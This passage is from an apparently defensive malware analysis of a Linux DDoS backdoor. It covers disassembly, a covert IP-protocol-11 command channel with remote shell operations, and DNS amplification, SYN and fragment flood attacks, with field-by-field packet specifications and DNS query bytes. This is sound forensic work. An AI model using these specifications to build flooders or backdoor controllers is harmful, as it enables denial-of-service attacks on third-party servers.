0xfffffff0(%ebp),%eax 0x80490f2: pushl %eax 0x80490f3: pushl $0x0 0x80490f5: movl 0x14(%ebp),%eax 0x80490f8: addl $0x16,%eax 0x80490fb: pushl %eax 0x80490fc: pushl %esi 0x80490fd: movl 0xffffffbc(%ebp),%edi 0x8049100: pushl %edi 0x8049101: call 0x8056c3c 0xffffffbc(%ebp) is a stored copy of the socket() return earlier. %esi is obviously the beginning of the packet buffer. DataAmount + 0x16 (IP header + 2) is used as the amount of data to send. And finally, 0xfffffff0(%ebp) turns out to indeed be a sock_addr structure as initially believed. The return from sendto() is examined: 0x8049109: cmpl $0xffffffff,%eax 0x804910c: jne 0x8049118 If it was -1 (error): 0x804910e: pushl %esi 0x804910f: call 0x805c290 0x8049114: xorl %eax,%eax 0x8049116: jmp 0x804912c Else: 0x8049118: movl 0xffffffbc(%ebp),%edi 0x804911b: pushl %edi 0x804911c: call 0x8057160 0x8049121: pushl %esi 0x8049122: call 0x805c290 0x8049127: movl $0x1,%eax The calls to 0x805c290 are unknown, but given the assumption of a malloc or derivative being used before to return %esi, it is quite likely that this call is a free(). 0x8057160 is a close() call, done on the socket descriptor. This network function then returns. It should be noted, if it returns with %eax = 0 then an error occurred, if it is 1, it was successful. Disassembly Review: Finally, a simple, straight-forward network function! It would appear that IP_Address is a pointer to a 4 byte buffer, containing the source IP for the created packet. BufferA is a similar buffer, but with the destination IP for the packet. BufferB is a pointer to a buffer with DataAmount bytes to send as the contents of the packet. It should be noted that 2 extra bytes exist between the IP header and this "data". The first of which is set to 3, and the second of which does not seem to be set at all. It is unclear what this byte is, or would normally be for a sent packet. Function Overview: FINALLY! We have all the information to solve the many little puzzles of this code (primarily, the first two case sections in the main() section). This function appears to be the backchannel from this binary to the blackhat, using covert IP protocol 11 packets. A re-examination of the first two case sections needs to be done with this new information. This analysis will follow this function, and is named Re-Examination_A. The network traffic generated by this function will be examined in Network_Analysis_B Re-Examination_A - A look back on case sections 1 and 2 from main(). Reason: With the analysis of Network_Function_A and Network_Function_F, new information is available which opens the doors wide on some earlier code whose purpose could not be identified. Code Blocks Re-examined: 0x0804835c (Case section 1 - main()) 0x080483f0 (Case section 2 - main()) New information: Network_Function_A and Network_Function_F Analysis: 0x0804835c - Case section 1. This code is initially quite complex. The main component of this section appears to be the creation of a buffer starting at 0xfffff800(%ebp). Initially we see GlobalA placed into the first byte of this buffer. When we look back through all the code, Global_A actually never gets set anywhere! This assignment is either some kind of legacy code, preparation for future modifications, or an error (unless someone else can show where it is used!??!). The next two bytes are obviously set to 1 and 7. The purpose of which is unclear, but it is assumed to mean something to the client, perhaps an ID for the binary, or a version. PID_Var_B appears to be used next. This variable was used to store the PID of any fork()'s that were running. In many cases (with the packetting functions at least), more functions would refuse to run while another was, all judged off PID_Var_B. The interesting thing is, if PID_Var_B is 0, the next buffer byte is a 0, if not, it is a 1. This *might* be some kinda of indication for the blackhat to know that their binary is doing something (busy?). What backs this up, is if PID_Var_B is indeed non-zero (indicating something is happening), the next byte of this buffer is set to Global_C. What is Global_C again? It was a global variable that was always assigned a number which seemed to be based upon the case statement. Effectively, if for instance case section 10 was forked out and running, Global_C would be 10. Same goes for many of the other case sections (the long-term ones). This means that this buffer now contains information about the "status" of the binary. i.e. Is it running anything, and if so, what? The code picks up again at 0x80483a7 where it prepares to call Data_Manipulation_Function_B. This was proven before to be an encoding / decoding function (in this case it looks to be used to encode). random() is called and seems to MOD 0xc9 ensuring a value between 0 and 200. This value is then +0x190 and passed to Network_Function_A in which it has the effect of being the amount of data bytes to send. The first parameter passed to this function, 0xffffbb1c(%ebp) we will see more of in case section 2 of this re-examination. It turns out, it is used to contain the IP address(s) that Network_Function_A uses to send off packets to. We will see how this buffer is constructed soon. And finally, the second parameter passed to Network_Function_A, 0xffffbb20(%ebp). This buffer is the encoded data from Data_Manipulation_Function_B. This means that the information passed by this case section is encoded using Data_Manipulation_Function_B! 0x080483f0 - Case section 2. This section is one of the more complex to follow, but uses simplistic programming structures. This section uses data from within the packet. This was already looked at earlier. What was unknown at the time, was that the packet data would have been encoded for network transfer. The data was then decoded and used for this case section. The most important part is right at the beginning. Global_B is set to the third byte of the decoded buffer. This is an extremely important variable. The analysis of Network_Function_A revealed that if Global_B was 0, packets would be sent to just one IP. If Global_B was non-zero, 10 IP's would have data sent to them. This all becomes important when one tries to work out what these IP addresses actually are (we will definately want to know!). The source IP for Network_Function_F is also set to the destination IP of the packet that resulted in this case section getting executed. (This is a pretty handy trick since it eliminates interface scouring). Back to the destination IP addresses: random() is called at 0x8048440, with the result MOD 0xa, and is stored in %edi. A loop is formed from this point down to 0x8048532. The condition for ending the loop appears to be that 10 iterations should have happened (probably a for-loop). The counter for each iteration is %ebx. The first conditional within this loop is: 0x8048454: cmpl %edi,%ebx 0x8048456: je 0x804852b Obviously, this guts of this loop will occur on all but one iteration. That is, when %edi = %ebx. What purpose does this have? We'll soon see! The purpose of this loop, is to set the data buffer starting at 0xffffbb1c(%ebp). This buffer was used in the previous case section (and also in case section 3) as the destination IP(s) to pass to Network_Function_A. In effect, this case section has the effect of the blackhat telling the program who to call home! Global_B Also had the effect of making Network_Function_A send 1 packet if it was 0, and 10 packets if anything else. On all other iterations of the loop (%edi != %ebx), Global_B (set a few lines earlier) is checked. If it is 2, it would appear that the data from the decoded buffer is copied directly into indexed positions starting at 0xffffbb1c(%ebp). If Global_B is anything else, the data placed into indexed positions from 0xffffbb1c(%ebp) is randomly generated. What happens on that one iteration where %edi == %ebx? If Global_B is 0, the first 4 bytes starting at 0xffffbb1c(%ebp) are set to the first 4 bytes from 0xfffff003(%ebp). Since only one packet is sent by Network_Function_A when Global_B is 0, this is the destination (and most probably the place that the blackhat's client is running on) If Global_B is 2, 9 of the 10 iterations would have copied data from the decoded buffer (effectively allowing the blackhat to set all of these IPs). What happens on the 10th IP (the one where %edi == %ebx) is a mystery. It appears to be left to whatever is may have been earlier (This could be a programming flaw on behalf of the blackhat! - Could even lead to working out their client machine's IP). If Global_B is anything else, the missing iteration is filled in with the first four bytes from 0xfffff003(%ebp). This ends this case section. The reasoning behind such a complex system of multiple destinations for packets is obviously one of obfuscation. It most certainly makes things extremely tough to 'prove' just who an attacker is (notice the word prove). Network_Analysis_A - Incoming covert communications channel. About: This binary listens for packets matching a particular description. Upon receiving certain packets, it will do certain actions. This section will attempt to add some structure to be able to work out what is occuring from network traffic. Packet structure: IP level: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | DDOS 1 | DDOS 2 | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | | + COVERT DATA BUFFER + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Special Fields (Necessary): Total Length: Must be greater than 200 (well recv() has to get more than 200 bytes, so theoretically this means the total length on a non-corrupt packet would be > 200. Protocol: Must be 11. Destination Address: This doesn't necessarily have to be anything, but it is used as the source IP address for any outgoing covert communications (see Network_Analysis_B) DDOS1: This must be a 2. DDOS2: This byte doesn't seem to be used or checked. COVERT DATA BUFFER: This is filled with an encoded buffer that is decoded by Data_Manipulation_Function_A. Covert Data Buffer decoded: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Unknown | Operation | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ DATA BUFFER + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ This structure represents a DECODED representation of the covert data buffer. The data is analysed and the Operation field used to control various actions: Operation Field: 1: Generates a covert channel response to the blackhat which contains the status of the binary. It could also be a covert packetting tool but is extremely ulikely :) 2: An interesting feature of this binary is the covert packet channel. The binary can generate a single packet to the attacker, or 10 duplicate packets to the attacker which are sent to different destination IPs. This operation mode tells the binary to choose between the 1 and 10, and also has the ability to set the various destination IPs. It should be noted that the binary has no 'preset' blackhat address. It can only find it out through this operation. The modes of operation are determined by the first byte of DATA BUFFER: 0: The next four bytes will be used as the octets for a single covert packet effect. 1: The next four bytes will be used as the octets, but will be placed in a list with 9 other randomly generated IPs. The position of these octets in this list appears random. 10 packets will be sent for every covert packet generated, one to each IP. 2: IP octets are read directly from the next 40 bytes. Due to the complexity of this code, it is unclear if a potential error is in the code whereby one of the IP's will be skipped. (Or this has some reason that has been overlooked?) 3: Another innovative feature, a covert 'shell' almost. /bin/csh is called to execute a command that starts at DATA BUFFER. The output of this is then sent back via the covert channel. 4: Calls Network_Function_B (DNS Amplification Attack) 5: Calls Network_Function_C (Corrupt packet flood) 6: Creates a password guarded bind shell. 7: Executes a command in the same manner as operation 3, except the output is not sent back. 8: Appears to have the ability to stop any running 'packetting' function, as well as the shell in operation 6. 9: Calls Network_Function_B (DNS Amplification Attack) The difference between this and the earlier operation is that this one looks to be able to adjust the speed. 10: Calls Network_Function_D (SYN packet flood) 11: Calls Network_Function_D (SYN packet flood) The difference to the last operation appears to once again be that this one has an adjustable speed based. 12: Calls Network_Function_E (DNS request flood) Many of these operation fields have their own format for the rest of the DATA BUFFER. The relative function analysis, combined with the case sections can be used as a reference to see what the rest of the buffer does. Overview: This covert communications channel has one main feature of being undetected by many popular network monitoring utilities that only listen on known protocols. Communication takes place over an unconnected (and therefore spoofable) protocol. This allows an attacker to VERY anonymously (and very quickly) control many infected machines. Network_Analysis_B - Outgoing covert communications channel. About: There exists the ability to send data to the blackhat via an encoded and covert network channel. The use of this channel seems to be limited to seeing the 'status' of the binary, or being able to see the output of executed commands. Packet structure: IP level: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | DDOS 1 | DDOS 2 | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | | + COVERT DATA BUFFER + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Special Fields: Version: 4 IHL: 5 TOS: 0 Total Length: random between 422 and 622 bytes ID: random Flags / Fragment Offset: 0 TTL: 250 (start) Protocol: 11 Checksum: Believed to be correct (but unchecked) Source Address: infected machine Destination Address: Up to 10 addresses that can be random, or manually set by the blackhat. The blackhat would most probably (but by no means has to) be running a client for this backdoor on one of these addresses. DDOS1: 3 DDOS2: Unknown COVERT DATA BUFFER : Contains encoded data, as encoded by Data_Manipulation_Function_B. Overview: The main feature of this channel is its ability to send 'decoy' packets along with one to a real client. Decoy packets have often been used for scanning networks, it now looks like they are being used in DDOS utils and backdoors too. Network_Analysis_C - DNS amplification attack About: The DNS system looks to be abused by Network_Function_B. A stream of UDP packets has been identified being sent to the DNS port of over 11 thousand IPs which are hardcoded into the binary. This has not been proven to be an amplification attack as yet, but there is little doubt that it will. Packet structure: IP level: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | UDP Source Port | UDP Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | UDP length | UDP Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | DNS ID |Q| OPCDE |A|T|R|A| Z | RCODE | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | QDCOUNT | ANCOUNT | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | NSCOUNT | ARCOUNT | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | DNS QUERY DATA | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Special Fields: Version: 4 IHL: 5 TOS: 0 Total Length: Between 48 and 53 bytes (depending on data) ID: random 0-254 Flags / Fragment Offset: 0 TTL: Random 120 to 250 Protocol: 17 (UDP) IP Checksum: Believed to be correct (but unchecked) Source Address: Primary victim of attack Destination Address: One of 11441 IP's (See Appendix A) These IP's are cycled through. UDP Source Port: Manually set by blackhat, or random 0-30000 UDP Dest Port: 53 (DNS) UDP Length: 28 to 33 (depending on data) UDP Checksum: 0 DNS ID: Random Q(Query/Resp): 0 (Query) OPCODE: 0 (Standard Query) A(Authorative): 0 T(Truncated): 0 R(Recursion D): 1 A(Recursion A): 0 Z: 0 RCODE: 0 QDCOUNT: 1 (1 Question) ANCOUNT: 0 NSCOUNT: 0 ARCOUNT: 0 DNS QUERY DATA: A loop is present in the code that cycles through the following QUERY data: "0x03 0x63 0x6F 0x6D 0x00 0x00 0x06 0x00 0x01" QNAME: ".com" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x6E 0x65 0x74 0x00 0x00 0x06 0x00 0x01" QNAME: ".net" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x64 0x65 0x00 0x00 0x06 0x00 0x01" QNAME: ".de" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01" QNAME: ".edu" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x6F 0x72 0x67 0x00 0x00 0x06 0x00 0x01" QNAME: ".org" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x75 0x73 0x63 0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01" QNAME: ".usc.edu"| QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x65 0x73 0x00 0x00 0x06 0x00 0x01" QNAME: ".es" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x67 0x72 0x00 0x00 0x06 0x00 0x01" QNAME: ".gr" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) "0x03 0x69 0x65 0x00 0x00 0x06 0x00 0x01" QNAME: ".ie" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet) Overview: This function obviously creates DNS requests, and throws them off to a list of 11441 IP's. In looking at the hostnames, it becomes quite apparant that many of these are DNS servers. In investigating 20 of these servers randomly, 17 gave valid responses to questions, 2 refused any query, and 1 was unreachable. This would suggest the list isn't new, or that the people in charge of these servers have noticed attacks and have acted to block them. The attack is most certainly a form of bandwidth amplification attack. A request (as seen above) is on average 41 bytes. In sniffing responses to the above queries (generated by host -t ns QNAME), responses are roughly 500 bytes long. This means roughly 12x amplification is achieved. Unfortunately, DNS traffic is quite difficult to filter and still maintain normal operations, making this a difficult attack to defend against. One thing that does stand out, is that the UDP checksum is 0. It is unclear as to if this will remain 0 when the packet is sent out. Network_Analysis_D - UDP / ICMP corrupt packet flood attack About: The purpose behind the packets sent out by Network_Function_C is unknown. The contents of these packets appears to be IP fragments that have less data to them than the header indicates. Packet structure: IP level: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Special Fields: Version: 4 IHL: 5 TOS: 0 Total Length: 10268 ID: 1109 Flags / Fragment Offset: Offset = 8190 (flags = 0) TTL: Random 120 to 250 Protocol: 1(ICMP) / 17 (UDP) IP Checksum: Believed to be correct (but unchecked) Source Address: Can be set to a single IP, or randomised Destination Address: This is the primary victim of the attack. The traffic generated by Network_Function_C can take one of two forms: ICMP, or UDP. This is decided by the blackhat, and is not a mix. The following are the relative 2nd layer headers: ICMP: +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Type | Code | Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Internet Header + 64 bits of Original Data Datagram | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: 8 (ICMP_ECHO) Code: 0 Checksum: Believed to be correct (But unchecked) UDP: +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | UDP Source Port | UDP Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | UDP length | UDP Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | DATA | +-+-+-+-+-+-+-+-+ UDP Source Port: Always random 0-254. UDP Destination Port: Always set by the blackhat to a single port. UDP Length: 9 (indicating 1 byte of data) UDP Checksum: Believed to be correct (But unchecked) Overview: This traffic seems corrupt. This may be deliberate and attempts to illicit error conditions, or perhaps it has some other sneaky purpose? Run-time testing will be needed to try to understand the purpose behind these packets. Network_Analysis_E - SYN flood attack About: An implementation of a SYN flooder, undoubtedly with the same purpose that many SYN flooders have been written in the past. Packet structure: IP level: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Special Fields: Version: 4 IHL: 5 TOS: 0 Total Length: 40 ID: random 0-254 Flags / Fragment Offset: 0 TTL: Random 125 to 240 Protocol: 6 (TCP) IP Checksum: Believed to be correct (but unchecked) Source Address: Can be set to a single IP, or randomised Destination Address: Primary victim of attack TCP Source Port: Randomised between 1 and 40000 TCP Dest Port: Set by attacker to a single port Seq Number: Random 1 to 40000000 Ack Number: 0 Data Offset: 5 (20 byte tcp header) Flags: SYN Window: Random 200 to 1600 TCP Checksum: Calculated off pseudo header (unchecked if correct) Urgent Pointer: 0 Overview: This attack has been seen many a time before, a simple SYN flooder. Nothing particularly nasty about this one, except perhaps the randomisation of several parts. The destination IP is also reachable thru resolution of a hostname, which can be relooked up every X seconds(minutes). This could be simply an ease of use option to the blackhat, but is more likely to be for pro-longed attacks with no interaction from the blackhat. Network_Analysis_F - DNS request flood attack About: This one is the most interesting (and perhaps the most serious) attack in this binary. It is related to the DNS amplification attack, except this time is would appear a single server is used to generate the amplification. This would obviously cause a DoS condition for that server (and a serious one at that). Packet structure: Network_Analysis_C shows the types of packets that are constructed in this attack. The differences however: Destination IP: This is the victim. Source IP: This source can be set by the blackhat to a single address, or it can be continuously randomised. UDP Checksum: Always 0. UDP Source Port: Can be set by blackhat, or can be random. Overview: This traffic is perhaps the most important attack to analyse from the whole binary. Primarily because enough infected machines could cause a DoS against pretty much any public nameserver on the Internet. Any public nameserver ofcourse includes gtld and root servers. Coupled with the ability to specify hostnames which are periodically resolved, this attack IS something to be worried about. It is ofcourse nothing new, a DDOS form of this attack is something that has been expected for a long time, as is an undoubted attack on the DNS system. Hopefully the blackhat(s) involved with this DDOS have not compromised enough machines to carry out a large attack, or do not have a desire to do it. (How long till we see a better protected DNS system put into place? - This IS important.) Appendix A - DNS Servers as used by Network_Function_B The following servers are embedded within the binary for use as traffic amplifiers. They start from 0x806d22c which corresponds to four bytes after the start of the .data section. Accordingly, the file offset for these is 0x2422c bytes, with the number in little endian word ordering. For instance: 000c 0282 = 0c.00.82.02 = 12.0.130.2 A file (dnsrip.c) has been provided that works with the HoneyNet supplied binary ONLY. exploit-dev:/reverse# ./dnsrip the-binary | wc -l 11441 A simple shell script can be used to resolve each of these IPs. Due to the size of the list (11441 servers!) the output is not included here, but can be found in DNS_Amplification_Servers.